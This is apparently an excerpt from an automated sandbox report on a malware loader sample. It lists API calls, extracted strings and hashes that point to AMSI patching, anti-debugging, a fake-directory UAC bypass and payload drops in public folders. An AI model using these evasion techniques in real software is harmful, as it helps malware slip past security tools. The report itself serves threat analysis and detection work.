• Instruction Fuzzy Hash: C201A2B4A44304AFEB00EFA4DC41E5EB7FEEB48740F9084E0F40497610DA34A905DA24
APIs
• RtlI.N(?,?,00000000,02B2DC7E), ref: 02B2DC2C
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC42
• NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC61
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: Path$DeleteFileNameName_
• String ID:
• API String ID: 4284456518-0
• Opcode ID: 61a08e4082b907a7fadada8ef99bea835fdc52f3085f566acc936c24da98cff4
• Instruction ID: 7e57c1e19183b966585c856fc1901b44e08328d363bdf6be433c6ecf41e8b3b6
• Opcode Fuzzy Hash: 61a08e4082b907a7fadada8ef99bea835fdc52f3085f566acc936c24da98cff4
• Instruction Fuzzy Hash: 4C01A275A4430A6EEB05DBA08D55FCD77B9AB44304F5005D29204E6081DAB4AB088B24
APIs
  • Part of subcall function 02B14F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B14F2E
• RtlI.N(?,?,00000000,02B2DC7E), ref: 02B2DC2C
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC42
• NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC61
  • Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: PathString$AllocDeleteFileFreeNameName_
• String ID:
• API String ID: 1530111750-0
• Opcode ID: 66a4a3a4823cf7049789eae3ca951f846f0146a4fb19272d5dcc8bbded89c83b
• Instruction ID: af9d69ab82114b9e8ef285d9bb1cec7df01d799a0ad4891b53d89aa00e2aabc6
• Opcode Fuzzy Hash: 66a4a3a4823cf7049789eae3ca951f846f0146a4fb19272d5dcc8bbded89c83b
• Instruction Fuzzy Hash: A701F47194030DBEEB11EBA0DD56FCDB3BDEB48700F9145E1E605E6590EA74AB088A64
APIs
  • Part of subcall function 02B26D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02B26DB9,?,?,?,00000000), ref: 02B26D99
• CoCreateInstance.OLE32(?,00000000,00000005,02B26EAC,00000000,00000000,02B26E2B,?,00000000,02B26E9B), ref: 02B26E17
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateFromInstanceProg
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2151042543-0
                                                                                                                                                                                                                          • Opcode ID: 65475bca08fe62d4683997fa76f9561573564cbccf2fd98dd4fa29a6a45e5e62
                                                                                                                                                                                                                          • Instruction ID: 65ce6676ed6112fabea7441798b2c83f6ccd0f2f1b98e0c1ec686466d75e23e9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65475bca08fe62d4683997fa76f9561573564cbccf2fd98dd4fa29a6a45e5e62
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B01F231608708AEF711EF61DC6296FBBBDE749B00B9108B5F409E2690EA309D14C964
APIs
• InetIsOffline.URL(00000000,00000000,02B3B784,?,?,?,00000000,00000000), ref: 02B2F801
  • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(742B0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,742B0000,00000000,00000000), ref: 02B28AAA
  • Part of subcall function 02B2F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02B2FAEB,UacInitialize,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,Initialize), ref: 02B2F6EE
  • Part of subcall function 02B2F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B2F700
  • Part of subcall function 02B2F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B2F754
  • Part of subcall function 02B2F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B2F766
  • Part of subcall function 02B2F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B2F77D
  • Part of subcall function 02B17E5C: GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
  • Part of subcall function 02B1C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C8B8B8,?,02B30751,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession), ref: 02B1C37B
  • Part of subcall function 02B2DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDAB
  • Part of subcall function 02B2DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDDB
  • Part of subcall function 02B2DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B2DDF0
  • Part of subcall function 02B2DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B2DE1C
  • Part of subcall function 02B2DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B2DE25
  • Part of subcall function 02B17E80: GetFileAttributesA.KERNEL32(00000000,?,02B3356F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,Initialize), ref: 02B17E8B
  • Part of subcall function 02B18048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02B3370D,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,Initialize,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8), ref: 02B18055
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
• String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
• API String ID: 297057983-2644593349
• Opcode ID: a17eed07ffbcc5f27070012b1c678ae930f3691f0b74f4ef17f4a13818689182
• Instruction ID: b55d02beae2f92b8f966ebe61073465c5925099330f520550f308a12bacbcafb
• Opcode Fuzzy Hash: a17eed07ffbcc5f27070012b1c678ae930f3691f0b74f4ef17f4a13818689182
• Instruction Fuzzy Hash: 2714E875A0012C9FDB11EB64DD80ACE73BAFF85304FA041E6E549EB218DA30AE95DF51

Control-flow Graph

• Legend: Executed / Not Executed
• Graph rendering not recoverable from the page; the graph covers the code range 2b38128-2b3b2fa and reaches the Windows API calls CreateProcessAsUserW, ResumeThread, CloseHandle and ExitProcess along its paths.
APIs
  • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(742B0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,742B0000,00000000,00000000), ref: 02B28AAA
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C8B7E0,02C8B824,OpenSession,02B97380,02B3B7B8,UacScan,02B97380), ref: 02B386E9
• ResumeThread.KERNEL32(00000000,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8), ref: 02B38D33
• CloseHandle.KERNEL32(00000000,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,00000000,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380), ref: 02B38EB2
  • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
  • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
  • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
• CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02B97380,02B3B7B8,UacInitialize,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380), ref: 02B392A4
  • Part of subcall function 02B17E5C: GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
  • Part of subcall function 02B2DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DD5E), ref: 02B2DCCB
  • Part of subcall function 02B2DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B2DD05
  • Part of subcall function 02B2DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B2DD32
  • Part of subcall function 02B2DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B2DD3B
  • Part of subcall function 02B28338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B283C2), ref: 02B283A4
• ExitProcess.KERNEL32(00000000,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,Initialize,02B97380,02B3B7B8,00000000,00000000,00000000,ScanString,02B97380,02B3B7B8), ref: 02B3B2FA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
• String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
• API String ID: 2769005614-3738268246
• Opcode ID: 04328828d6d82fd6c1147251dd6a065ad74ed4474d361b36479348b3b70a6c25
• Instruction ID: 3b474daacc5860f6207b0732d1cef65210261a39ded1c710ba4e0d4c46b18a38
• Opcode Fuzzy Hash: 04328828d6d82fd6c1147251dd6a065ad74ed4474d361b36479348b3b70a6c25
• Instruction Fuzzy Hash: 8C43FA79A0422CDFDB11EB64DD809CE73BAFF85344FA041E5E109EB218DA30AE959F51
APIs
  • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(742B0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,742B0000,00000000,00000000), ref: 02B28AAA
  • Part of subcall function 02B2DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DD5E), ref: 02B2DCCB
  • Part of subcall function 02B2DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B2DD05
  • Part of subcall function 02B2DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B2DD32
  • Part of subcall function 02B2DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B2DD3B
• Sleep.KERNEL32(000003E8,ScanBuffer,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,02B3BB30,00000000,00000000,02B3BB24,00000000,00000000), ref: 02B340CB
  • Part of subcall function 02B288B8: LoadLibraryW.KERNEL32(amsi), ref: 02B288C1
  • Part of subcall function 02B288B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B28920
• Sleep.KERNEL32(000003E8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,000003E8,ScanBuffer,02B97380,02B3B7B8,UacScan,02B97380), ref: 02B34277
  • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
  • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
  • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
• Sleep.KERNEL32(00004E20,UacScan,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacInitialize,02B97380,02B3B7B8), ref: 02B350EE
  • Part of subcall function 02B2DC04: RtlI.N(?,?,00000000,02B2DC7E), ref: 02B2DC2C
  • Part of subcall function 02B2DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC42
  • Part of subcall function 02B2DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC61
  • Part of subcall function 02B17E5C: GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
  • Part of subcall function 02B285BC: WinExec.KERNEL32(?,?), ref: 02B28624
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
• String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
• API String ID: 2171786310-3926298568
• Opcode ID: a5b7a353f178f0ba000926f55702d93c9aa022628ed425f8b21b61047277497a
• Instruction ID: 62078ccba6966533380f2eae02c982846eff6cc491d1a7ac3b9f7e4da3072893
• Opcode Fuzzy Hash: a5b7a353f178f0ba000926f55702d93c9aa022628ed425f8b21b61047277497a
• Instruction Fuzzy Hash: 6143F475A0016D9FDB21EB64DD80BDE73B6FF85304FA040E6A409AB618DF30AE859F51

Control-flow Graph
APIs
  • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(742B0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,742B0000,00000000,00000000), ref: 02B28AAA
  • Part of subcall function 02B28788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
  • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
  • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
  • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
• WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02B97380,02B2EF4C,OpenSession,02B97380,02B2EF4C,UacScan,02B97380,02B2EF4C,ScanBuffer,02B97380,02B2EF4C,OpenSession,02B97380), ref: 02B2ED6E
• CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02B97380,02B2EF4C,OpenSession,02B97380,02B2EF4C,UacScan,02B97380,02B2EF4C,ScanBuffer,02B97380,02B2EF4C,OpenSession), ref: 02B2ED76
• CloseHandle.KERNEL32(0000090C,00000000,00000000,000000FF,ScanString,02B97380,02B2EF4C,OpenSession,02B97380,02B2EF4C,UacScan,02B97380,02B2EF4C,ScanBuffer,02B97380,02B2EF4C), ref: 02B2ED7F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
• String ID: )"C:\Users\Public\Libraries\ymafvvdS.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
• API String ID: 3475578485-3731113069
• Opcode ID: 0a6ddb2d7eb5777d3af45d2f8b7fc4ea178817638cecd22a24c7050454c484b1
• Instruction ID: c80103336dc4fed7a1c2e7ba24b12b97f04995ee7cfe0ec7b825dfb9d7ce315a
• Opcode Fuzzy Hash: 0a6ddb2d7eb5777d3af45d2f8b7fc4ea178817638cecd22a24c7050454c484b1
• Instruction Fuzzy Hash: 0622D375A0026D9FEB11FB65D881BCE73B6AF85300F5041E1A149EB254DB30EE49CF66

Control-flow Graph

control_flow_graph 13139 2b11724-2b11736 13140 2b11968-2b1196d 13139->13140 13141 2b1173c-2b1174c 13139->13141 13144 2b11a80-2b11a83 13140->13144 13145 2b11973-2b11984 13140->13145 13142 2b117a4-2b117ad 13141->13142 13143 2b1174e-2b1175b 13141->13143 13142->13143 13150 2b117af-2b117bb 13142->13150 13146 2b11774-2b11780 13143->13146 13147 2b1175d-2b1176a 13143->13147 13151 2b11684-2b116ad VirtualAlloc 13144->13151 13152 2b11a89-2b11a8b 13144->13152 13148 2b11986-2b119a2 13145->13148 13149 2b11938-2b11945 13145->13149 13158 2b117f0-2b117f9 13146->13158 13159 2b11782-2b11790 13146->13159 13153 2b11794-2b117a1 13147->13153 13154 2b1176c-2b11770 13147->13154 13160 2b119b0-2b119bf 13148->13160 13161 2b119a4-2b119ac 13148->13161 13149->13148 13155 2b11947-2b1195b Sleep 13149->13155 13150->13143 13162 2b117bd-2b117c9 13150->13162 13156 2b116df-2b116e5 13151->13156 13157 2b116af-2b116dc call 2b11644 13151->13157 13155->13148 13163 2b1195d-2b11964 Sleep 13155->13163 13157->13156 13169 2b117fb-2b11808 13158->13169 13170 2b1182c-2b11836 13158->13170 13166 2b119c1-2b119d5 13160->13166 13167 2b119d8-2b119e0 13160->13167 13165 2b11a0c-2b11a22 13161->13165 13162->13143 13168 2b117cb-2b117de Sleep 13162->13168 13163->13149 13171 2b11a24-2b11a32 13165->13171 13172 2b11a3b-2b11a47 13165->13172 13166->13165 13177 2b119e2-2b119fa 13167->13177 13178 2b119fc-2b119fe call 2b115cc 13167->13178 13168->13143 13176 2b117e4-2b117eb Sleep 13168->13176 13169->13170 13179 2b1180a-2b1181e Sleep 13169->13179 13173 2b118a8-2b118b4 13170->13173 13174 2b11838-2b11863 13170->13174 13171->13172 13180 2b11a34 13171->13180 13183 2b11a49-2b11a5c 13172->13183 13184 2b11a68 13172->13184 13185 2b118b6-2b118c8 13173->13185 13186 2b118dc-2b118eb call 2b115cc 13173->13186 13181 2b11865-2b11873 13174->13181 13182 2b1187c-2b1188a 13174->13182 13176->13142 13187 2b11a03-2b11a0b 13177->13187 13178->13187 13179->13170 13189 2b11820-2b11827 Sleep 13179->13189 13180->13172 13181->13182 13190 2b11875 13181->13190 13191 2b118f8 13182->13191 13192 2b1188c-2b118a6 call 2b11500 13182->13192 13193 2b11a6d-2b11a7f 13183->13193 13194 2b11a5e-2b11a63 call 2b11500 13183->13194 13184->13193 13195 2b118ca 13185->13195 13196 2b118cc-2b118da 